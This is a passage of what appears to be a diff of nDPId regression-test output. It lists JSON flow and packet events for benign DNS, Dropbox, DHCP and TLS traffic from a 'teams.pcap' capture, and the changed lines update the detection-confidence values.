{"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00772{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":645,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679059,"flow_last_seen":1587041679059,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":41,"flow_tot_l4_payload_len":41,"flow_avg_l4_payload_len":41,"midstream":0,"thread_ts_msec":1587041679059,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":0,"num_answers":0,"reply_code":0,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":646,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
01096{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":646,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_packet_id":1,"flow_last_seen":1587041679280,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":527,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":527,"pkt_l4_len":493,"thread_ts_msec":1587041679280,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAIBKZoAAEARjaTAqAEG\/\/\/\/\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"} -00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} +00646{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":646,"source":"teams.pcap","alias":"nDPId-test","flow_id":11,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"255.255.255.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
00584{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":647,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 01092{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":647,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_packet_id":1,"flow_last_seen":1587041679280,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":527,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":527,"pkt_l4_len":493,"thread_ts_msec":1587041679280,"pkt":"\/\/\/\/\/\/\/\/KDc3AG3ICABFAAIBMegAAEARwq7AqAEGwKgB\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"} -00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 
+00644{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":647,"source":"teams.pcap","alias":"nDPId-test","flow_id":12,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041679280,"flow_last_seen":1587041679280,"flow_idle_time":200000,"flow_min_l4_payload_len":485,"flow_max_l4_payload_len":485,"flow_tot_l4_payload_len":485,"flow_avg_l4_payload_len":485,"midstream":0,"thread_ts_msec":1587041679280,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.255","src_port":17500,"dst_port":17500,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"Dropbox","breed":"Acceptable","category":"Cloud"}} 00184{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":648,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041679406} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":648,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041679280,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00181{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":649,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041679611} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":649,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041679280,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 
00489{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":650,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":2,"flow_last_seen":1587041680062,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":83,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":83,"pkt_l4_len":49,"thread_ts_msec":1587041680062,"pkt":"EBMx8Tl2KDc3AG3ICABFAABFhq8AAP8RsaDAqAEGwKgBAfouADUAMTs\/p0sBAAABAAAAAAAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAE="} 00564{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":651,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_packet_id":3,"flow_last_seen":1587041680074,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":136,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":136,"pkt_l4_len":102,"thread_ts_msec":1587041680074,"pkt":"KDc3AG3IEBMx8Tl2CABFAAB61LQAAEARImfAqAEBwKgBBgA1+i4AZgAAp0uBgwABAAAAAQAAAWIHX2Rucy1zZARfdWRwBG50b3ADb3JnAAAMAAHAGwAGAAEAAAA7ACkFZG5zZG\/AGwpwb3N0bWFzdGVywBt4ZvNkAACowAAAHCAAJOoAAAACWA=="} -00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":651,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041679059,"flow_last_seen":1587041680074,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041680074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
+00781{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":651,"source":"teams.pcap","alias":"nDPId-test","flow_id":10,"flow_state":"info","flow_packets_processed":3,"flow_first_seen":1587041679059,"flow_last_seen":1587041680074,"flow_idle_time":200000,"flow_min_l4_payload_len":41,"flow_max_l4_payload_len":94,"flow_tot_l4_payload_len":176,"flow_avg_l4_payload_len":58,"midstream":0,"thread_ts_msec":1587041680074,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":64046,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS.ntop","breed":"Safe","category":"Network"},"dns": {"query":"b._dns-sd._udp.ntop.org","num_queries":1,"num_answers":1,"reply_code":3,"query_type":12,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00576{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":664,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1587041680216,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00927{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":664,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1587041680216,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":397,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":397,"pkt_l4_len":363,"thread_ts_msec":1587041680216,"pkt":"\/\/\/\/\/\/\/\/AICPmq69CABFAAF\/44MAAEARlesAAAAA\/\/\/\/\/wBEAEMBa5dnAQEGABWCmMYYtQAAAAAAAAAAAAAAAAAAAAAAAACAj5quvQAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAABjglNjNQEBPRP\/j5quvQABAAEfyzfOuCfrPQjbUAB0AQE5AgXcPC1kaGNwY2QtNi4xMC4xOkxpbnV4LTQuOS41Ny12Nys6YXJtdjdsOkJDTTI4MzUMDHBpMy5udG9wLm9yZ5EBATcPAXkhAwYMDxocKjM2Ojt3\/w=="} -00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1587041680216,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} 
+00693{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":664,"source":"teams.pcap","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680216,"flow_last_seen":1587041680216,"flow_idle_time":200000,"flow_min_l4_payload_len":355,"flow_max_l4_payload_len":355,"flow_tot_l4_payload_len":355,"flow_avg_l4_payload_len":355,"midstream":0,"thread_ts_msec":1587041680216,"l3_proto":"ip4","src_ip":"0.0.0.0","dst_ip":"255.255.255.255","src_port":68,"dst_port":67,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DHCP","breed":"Acceptable","category":"Network"},"dhcp": {"hostname":"","fingerprint":"","class_ident":""}} 00579{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7580000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1587041680294,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00519{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1587041680294,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":102,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":102,"pkt_l4_len":68,"thread_ts_msec":1587041680294,"pkt":"KDc3AG3IEBMx8Tl2CABFAABYCTNAAHEGSuNdPpadwKgBBgG77GBJd2ZkkI5L3oAY\/\/uUpgAAAQEICsJ1bW4wg\/kbFwMDAB8AAAAAAAAABVYf48xkHJTZ\/YMO7dmv4tC6Gofi60hR"} 
-00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7580000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1587041680294,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} +00627{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":665,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041680294,"flow_last_seen":1587041680294,"flow_idle_time":7580000,"flow_min_l4_payload_len":36,"flow_max_l4_payload_len":36,"flow_tot_l4_payload_len":36,"flow_avg_l4_payload_len":36,"midstream":1,"thread_ts_msec":1587041680294,"l3_proto":"ip4","src_ip":"93.62.150.157","dst_ip":"192.168.1.6","src_port":443,"dst_port":60512,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"TLS","breed":"Safe","category":"Web"}} 00449{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":666,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":2,"flow_last_seen":1587041680294,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":54,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":54,"pkt_l4_len":20,"thread_ts_msec":1587041680294,"pkt":"EBMx8Tl2KDc3AG3ICABFAAAoAABAAEAGhUbAqAEGXT6WnexgAbuQjkveAAAAAFAEAAAvzgAA"} 
01944{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":667,"source":"teams.pcap","alias":"nDPId-test","flow_id":14,"flow_packet_id":3,"flow_last_seen":1587041680294,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":1156,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1156,"pkt_l4_len":1122,"thread_ts_msec":1587041680294,"pkt":"KDc3AG3IEBMx8Tl2CABFAAR2CTRAAHEGRsRdPpadwKgBBgG77GBJd2aIkI5L3oAY\/\/v9PwAAAQEICsJ1bW4wg\/kbFwMDBD0AAAAAAAAABm9iu+t9XgqZR4s0F3BUPHh3OFodjBrwIjhJ5jzUDrtlDVli1SVxk270m+gEbse5EGdXD2tQPqX+uNfx4B7otIIyfqifH2S\/KFxGyKDkumEYrUX2hsTy4AvsIXg77ggsd77nUCYIUkr9Dcu1K8XBBisxPpHT+zWCDZADIu9GEbXV2\/9sowiGe8yrlpVrokOfQ1DpsHmZowwlG7Bi36UFm+L5Z6cwifqjKB8bGHxJp5qTVRJD\/elikR43sBRzkZfcKqYDSp7JYzhK3QKUfc6m5GUQ5dfnLhv5nlfAs74UtmJ5EyjXuAHe9YxanSSvzzG4JMTWGAY5tTjjtYwpZihFAGx52HToq2O+CpcbwPHV1TLQUDbT2yGJc7gM1GLG5aFGzYu4CebCnnBl2NsUqq80dM5DZBgWZFtSy9z2NYnNFnXM\/L50k82dbGP\/hbFfCNFMS6BvXhwvqUQidPN2cRmVwTsWXaFgKlMTAFoatWZ\/LRmGoWBdnNparAnK8NJzgtzGWejWpNSxsXZQ1NSy\/4QwWmZ1aiyH3lAZfsyIjqYBH478mZLwQeLwCsFzK39ybhvc8awbkRiAIoeLHCDrqRPBNhP62oMKfuuybYfQO5cgeLBcoVWj4YmTHvVqXUaiIJM0ecCweYrE28c1bMOuRYrnD6X5H1vOaut8zUARe+SwmWED1FAd9+LaLocuQm5mzrdNkB6aXE4s0lhsnmXfrvdjFstoXCwJT0nh7ITIpoT2HCapxHTDXopSW+f6iqr0aTti5yh8nUUMgZZ++9jn1o3T3lmRclm9+mgQdUUmHkA3dQCgvlVHN9ZAWzkNyqS56Hs+VXyhIUgDoTONh43ut\/yBnqLWJ6HXKcI6qe1ntdtXyoQyjYZpSOnm2uYp+6WFP8eztjtGexEu6hDqMx2fyQv\/mVl0auJxOvVANURsh9C6cu1LRWqw8SukcmJhO9ptW5iUNYclFK0BRMa7HDoqgqFCccb2WkU4sxDCVFF52CIMR33VkffteHiI9\/NgTNgZERM3tobFzsdXrDpRRXLWDage6O7fLzs8m9hERZCv46Exgndu8ho3VvbFCaZyMsnBpC0\/L6igC1xzLSs2ksZSkx5L9Q7VhMaHlPusEBUMQJ5uA6CkdGrw0a3GiTrkSUGJIGKC7WyL+yh36GZcaflqIrfqPpArwHS0O6hsLRU\/2t+Pwt19umaYcC7QuLOwfSwEr1PxrFtzW1mzlNCKarl0LmPBlPWyV5JfN4y4C1aRVZ7yV7\/4iclnIrddqAkiXdgSc+ai4OnXQhk4fgmfh+Ar5gfpmM8U2v\/X345bEZszWOszb+cdvmzW47cwiYheg59HkuZ4TWUwEFRrPkd047noDz+bhfvXLMYNCStN2XWEGpRFtvI8rpdiTmvHc7+aKDQSaaH8jzVNbso1cSOHqJjXtpeD+vrVfOMXgQ=="} 
00181{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":669,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041680611} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":669,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041680294,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681218,"flow_last_seen":1587041681218,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041681218,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00497{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":1,"flow_last_seen":1587041681218,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":89,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":89,"pkt_l4_len":55,"thread_ts_msec":1587041681218,"pkt":"EBMx8Tl2KDc3AG3ICABFAABLUFkAAP8R5\/DAqAEGwKgBAd06ADUANyl9Kf0BAAABAAAAAAAAB2NhcHRpdmUFYXBwbGUDY29tB2VkZ2VrZXkDbmV0AAABAAE="} 
-00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681218,"flow_last_seen":1587041681218,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041681218,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com.edgekey.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} +00780{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":850,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681218,"flow_last_seen":1587041681218,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":47,"flow_tot_l4_payload_len":47,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1587041681218,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com.edgekey.net","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 
00571{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":851,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1587041681248,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":142,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":142,"pkt_l4_len":108,"thread_ts_msec":1587041681248,"pkt":"KDc3AG3IEBMx8Tl2CABFAACAqEJAADkRFdPAqAEBwKgBBgA13ToAbAAAKf2BgAABAAIAAAAAB2NhcHRpdmUFYXBwbGUDY29tB2VkZ2VrZXkDbmV0AAABAAHADAAFAAEAAADSABkFZTcyNzkFZHNjZTkKYWthbWFpZWRnZcAmwDsAAQABAAAAFAAEFzKeWA=="} -00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":851,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681218,"flow_last_seen":1587041681248,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1587041681248,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com.edgekey.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.50.158.88"}} +00795{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":851,"source":"teams.pcap","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1587041681218,"flow_last_seen":1587041681248,"flow_idle_time":200000,"flow_min_l4_payload_len":47,"flow_max_l4_payload_len":100,"flow_tot_l4_payload_len":147,"flow_avg_l4_payload_len":73,"midstream":0,"thread_ts_msec":1587041681248,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":56634,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"6":"DPI"},"proto":"DNS","breed":"Acceptable","category":"ConnCheck"},"dns": {"query":"captive.apple.com.edgekey.net","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"23.50.158.88"}} 00184{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":853,"source":"teams.pcap","alias":"nDPId-test","layer_type":34969,"global_ts_msec":1587041681407} 00357{"packet_event_id":1,"packet_event_name":"packet","packet_id":853,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":34969,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041681401,"pkt":"\/\/\/\/\/\/\/\/2A0X1lWriJklgAAA2A0X1lWrAACAAADYDRfWVauACAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA"} 00181{"error_event_id":5,"error_event_name":"Unknown packet type","datalink":1,"packet_id":864,"source":"teams.pcap","alias":"nDPId-test","layer_type":38,"global_ts_msec":1587041681611} 00346{"packet_event_id":1,"packet_event_name":"packet","packet_id":864,"source":"teams.pcap","alias":"nDPId-test","pkt_oversize":false,"pkt_caplen":60,"pkt_type":38,"pkt_l3_offset":14,"pkt_l4_offset":0,"pkt_len":60,"pkt_l4_len":0,"thread_ts_msec":1587041681458,"pkt":"AYDCAAAAeCjKBfrMACZCQgMAAAAAAJAAeCjKBfrMAAAAAJAAeCjKBfrMgAEAAAYAAQAEAKWlpaWlpaWl"} 00575{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":865,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 
00484{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":865,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1587041681714,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":80,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":80,"pkt_l4_len":46,"thread_ts_msec":1587041681714,"pkt":"EBMx8Tl2KDc3AG3ICABFAABCnaYAAP8RmqzAqAEGwKgBAcdZADUALvSsiC0BAAABAAAAAAAABmV1LWFwaQNhc20Fc2t5cGUDY29tAAABAAE="} -00766{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":865,"source":"teams.pcap","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1587041681714,"flow_last_seen":1587041681714,"flow_idle_time":200000,"flow_min_l4_payload_len":38,"flow_max_l4_payload_len":38,"flow_tot_l4_payload_len":38,"flow_avg_l4_payload_len":38,"midstream":0,"thread_ts_msec":1587041681714,"l3_proto":"ip4","src_ip":"192.168.1.6","dst_ip":"192.168.1.1","src_port":51033,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 